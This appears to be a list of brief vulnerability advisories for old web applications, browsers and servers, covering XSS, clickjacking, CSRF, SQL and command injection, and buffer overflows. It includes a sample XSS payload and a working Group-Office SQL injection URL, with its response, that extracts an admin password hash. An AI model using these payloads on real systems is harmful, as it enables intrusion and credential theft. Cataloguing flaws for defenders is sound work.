Freelancers Marketplace Script is an Extensive and Powerful script written in PHP and Ajax to launch your own Freelancers website. The attacker can insert xss scripts in the 'title' and the 'describe project' area. Attack Pattern: '>><marquee><h1>XSS3d By Sid3^effects</h1><marquee>'
Netscape Browser (V9.0.0.6) is vulnerable to clickjacking. An attacker can use this vulnerability to trick users into clicking on malicious links or buttons. This vulnerability can be exploited by an attacker to perform malicious actions on behalf of the user.
This vulnerability allows an attacker to trick a user into clicking on a malicious link or button by overlaying it on top of a legitimate link or button. This vulnerability affects Safari Browser version 4.0.2.
This vulnerability allows an attacker to trick a user into clicking on a malicious link or button by overlaying it on top of a legitimate link or button. This vulnerability affects Opera Browser version 10.60.
A clickjacking vulnerability exists in Avant Browser (V11.7 build 45) which allows an attacker to trick a user into clicking on a malicious link or button by hiding it beneath a legitimate link or button.
Remote attacker can inject sql codes to the system that host target web application. Its high level vulnerability. In json.php 'get_comment' method called with value of HTTP Request that's name 'comment_id'. In the 'get_comment' method, variable '$comment_id' inserted to sql query and executed by application. Request: http://server/groupoffice/modules/comments/json.php?task=comment&comment_id=888881+union+select+1,2,3,4,5,6,(select+concat_ws(0x3a,username,password)+from+go_users+where+id=1) Response: {"data":{"id":"1","link_id":"2","link_type":"3","user_id":"4","ctime":"01-01-1970 1:00","mtime":"01-01-1970 1:00","comments":"admin:$1$sM5wjKS9$wJPfZZWO53uu8eCxjOesS/","user_name":""},"success":true}
ActiTime 2.0 MA is vulnerable to Cross Site Request Forgery (CSRF). The application does not verify the origin of the request when performing certain actions. This allows an attacker to perform certain actions on behalf of a logged in user, without the user's knowledge. The following actions are vulnerable: Create a new user, Delete a user, Change user password.
Remote attacker can execute commands on the system that host target web application. Its high level vulnerability. Attacker needs gnupg module that installed. In json.php export method called with HTTP Request that's name fingerprint. In the export method, variable $fingerprint passed to run_cmd method.
Power/Personal FTP Server is vulnerable to a buffer overflow attack when a malicious user sends a specially crafted RETR command with a PORT specified. This can cause a denial of service condition.
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installatons of Novell Groupwise Internet Agent. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the HTTP POST request. By sending a specially crafted request, an attacker can cause a stack-based buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of the user running the application.
Services By CQR